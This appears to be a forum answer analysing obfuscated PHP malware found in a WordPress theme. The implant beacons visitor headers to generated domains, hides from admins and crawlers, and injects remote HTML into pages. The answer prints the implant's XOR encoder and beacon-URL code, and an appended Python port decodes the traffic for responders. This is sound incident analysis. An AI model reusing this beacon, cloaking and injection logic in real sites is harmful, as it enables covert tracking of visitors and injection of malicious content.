[Solved] Malicious code found in WordPress theme files. What does it do?


After digging through the obfuscated code, untangling a number of preg_replace, eval and create_function statements, this is my attempt at explaining what the code does:

The code will start output buffering and register a callback function triggered at the end of buffering, e.g. when the output is to be sent to the web server.

First, the callback function will attempt to uncompress the output buffer contents if necessary using gzinflate, gzuncompress, gzdecode or a custom gzinflate-based decoder (I have not dug any deeper into this).

With the contents uncompressed, a request will be made containing the $_SERVER values of

  • HTTP_USER_AGENT
  • HTTP_REFERER
  • REMOTE_ADDR
  • HTTP_HOST
  • PHP_SELF

… to the domain given by chars 0-8 or 8-15 (randomly picks one or the other) in an md5 hash of the IPv4 address of “stat-dns.com” appended with “.com”, currently giving md5(".com" . <IPv4> ) => md5(".com8.8.8.8") => "54dfa1cb.com" / "33db9538.com".

The request will be attempted using file_get_contents, curl_exec, file and finally socket_write.

Note that no request will be made if:

  • any of the HTTP_USER_AGENT, REMOTE_ADDR or HTTP_HOST is empty/not set
  • PHP_SELF contains the word “admin”
  • HTTP_USER_AGENT contains any of the words “google”, “slurp”, “msnbot”, “ia_archiver”, “yandex” or “rambler”.

Secondly, if the output buffer contents have a body or html tag, and the response from the request above (decoded using the en2() function below) contains at least one “!NF0” string, the content between the first and second “!NF0” (or end of string) will be injected into the HTML page at the beginning of the body or, in case there is no body tag, the html tag.

The code used for encoding/decoding traffic is this one:

function en2($s, $q) {
    // $s: data to encode/decode, $q: numeric key (100000-999999).
    // Builds a keystream $g, 8 bytes per round, from a chain of md5 digests.
    $g = "";
    while (strlen($g) < strlen($s)) {
        // First round hashes the decimal key; later rounds hash the previous raw digest.
        $q = pack("H*", md5($g . $q . "q1w2e3r4"));
        $g .= substr($q, 0, 8);
    }
    // XOR with the keystream: the same call both encodes and decodes.
    return $s ^ $g;
}

$s is the string to encode/decode and $q is a random number between 100000 and 999999 acting as a key.

The request URL mentioned above is calculated like this:

$url = "http:// ... /" // one of the two generated domains
    . $op // Random number/key, also used as the en2() key
    . "?"
    . urlencode(
          urlencode( // double urlencoded, dot-separated base64 blobs
              base64_encode(en2( $http_user_agent, $op)) . "." .
              base64_encode(en2( $http_referrer,   $op)) . "." .
              base64_encode(en2( $remote_addr,     $op)) . "." .
              base64_encode(en2( $http_host,       $op)) . "." .
              base64_encode(en2( $php_self,        $op))
          )
      );

While I have not found any sign of what initially placed the malicious code on your server, or that it does anything other than allowing bad HTML/JavaScript code to be injected into your web pages, that does not mean that it is not still there.

You really should make a clean install, as suggested by @Bulk above:

The only way you’ll ever know for sure it’s been cleaned is to re-install absolutely everything you can from scratch – i.e. fresh wordpress install, fresh plugin install. Then literally comb every line of your theme for anything out of the ordinary. Also of note, they often will put things in wp-content/uploads that look like images but aren’t – check those too.

Pastebin here.

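As an added example (not part of the answer above or of the malware itself), here is a Python port of the en2() keystream, the domain-generation step, the beacon filters and the "!NF0" extraction described in the answer. It lets a responder decode a beacon query string or a C2 response captured from web-server or proxy logs offline, and check why a given visitor would or would not have been served the injected content. Function names, the constructed sample values and the case-insensitive user-agent match are this example's own assumptions.

```python
"""Offline helpers for the WordPress theme implant described in the answer.
Added example, not the original post's code; names and sample data are constructed."""
import base64
import hashlib
from typing import Dict, List, Optional, Tuple
from urllib.parse import quote, unquote

KEY_SUFFIX = b"q1w2e3r4"  # constant from the en2() function in the answer
BOT_WORDS = ("google", "slurp", "msnbot", "ia_archiver", "yandex", "rambler")
MARKER = "!NF0"
# Order of the dot-separated fields in the beacon query, per the answer.
FIELD_NAMES = ("HTTP_USER_AGENT", "HTTP_REFERER", "REMOTE_ADDR", "HTTP_HOST", "PHP_SELF")


def en2(s: bytes, q: int) -> bytes:
    """Port of en2(): XOR `s` with an md5-chained keystream seeded by the numeric key `q`.
    PHP concatenates the integer $q as its decimal string on the first round and the
    16 raw digest bytes afterwards; 8 bytes of each digest extend the keystream."""
    g = b""
    q_bytes = str(q).encode()
    while len(g) < len(s):
        q_bytes = hashlib.md5(g + q_bytes + KEY_SUFFIX).digest()
        g += q_bytes[:8]
    return bytes(a ^ b for a, b in zip(s, g))  # XOR: same call encodes and decodes


def beacon_domains(resolver_ip: str) -> Tuple[str, str]:
    """The two candidate C2 domains: hex chars 0-8 and 8-16 of md5(".com" + <IPv4 of
    stat-dns.com>), each with ".com" appended. Useful for DNS/proxy blocklists."""
    h = hashlib.md5((".com" + resolver_ip).encode()).hexdigest()
    return h[0:8] + ".com", h[8:16] + ".com"


def build_query(fields: List[str], op: int) -> str:
    """Reproduce the query-string encoding from the answer (used here only to
    construct sample input for decode_query)."""
    parts = [base64.b64encode(en2(f.encode(), op)).decode() for f in fields]
    return quote(quote(".".join(parts), safe=""), safe="")


def decode_query(query: str, op: int) -> Dict[str, str]:
    """Undo the double urlencode, split the dot-joined base64 blobs and en2-decode each.
    `op` is the numeric key that also appears as the path component of the URL."""
    raw = unquote(unquote(query))
    blobs = raw.split(".")
    return {
        name: en2(base64.b64decode(blob), op).decode("utf-8", "replace")
        for name, blob in zip(FIELD_NAMES, blobs)
    }


def beacon_suppressed(server: Dict[str, str]) -> bool:
    """True when the implant sends no request: a required field is empty, PHP_SELF
    contains 'admin', or the user agent names a crawler (matched case-insensitively,
    an assumption of this example)."""
    ua = server.get("HTTP_USER_AGENT", "")
    if not ua or not server.get("REMOTE_ADDR") or not server.get("HTTP_HOST"):
        return True
    if "admin" in server.get("PHP_SELF", ""):
        return True
    return any(word in ua.lower() for word in BOT_WORDS)


def extract_payload(decoded_response: str) -> Optional[str]:
    """Content between the first and second "!NF0" marker (or end of string) of an
    en2-decoded C2 response; None when no marker is present."""
    first = decoded_response.find(MARKER)
    if first < 0:
        return None
    start = first + len(MARKER)
    second = decoded_response.find(MARKER, start)
    return decoded_response[start:] if second < 0 else decoded_response[start:second]


if __name__ == "__main__":
    # Constructed sample: a visitor the implant would beacon about.
    sample_key = 424242
    sample_fields = ["Mozilla/5.0", "", "203.0.113.7", "blog.example", "/index.php"]
    query = build_query(sample_fields, sample_key)
    print("candidate domains for 8.8.8.8:", beacon_domains("8.8.8.8"))
    print("decoded beacon:", decode_query(query, sample_key))
    # Constructed C2 reply: what the page would inject is the text between the markers.
    reply = en2(b"ok!NF0<script src=\"//placeholder.invalid/x.js\"></script>!NF0end", sample_key)
    print("injected snippet:", extract_payload(en2(reply, sample_key).decode()))
```

The decoder needs the key `$op`, which the implant puts in plain sight as the last path component of the beacon URL, so a single proxy log line carries everything required to recover the five fields. Checking beacon_suppressed() against your own test requests explains why the injection is invisible when you browse as an administrator or fetch the page with a crawler-like user agent.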
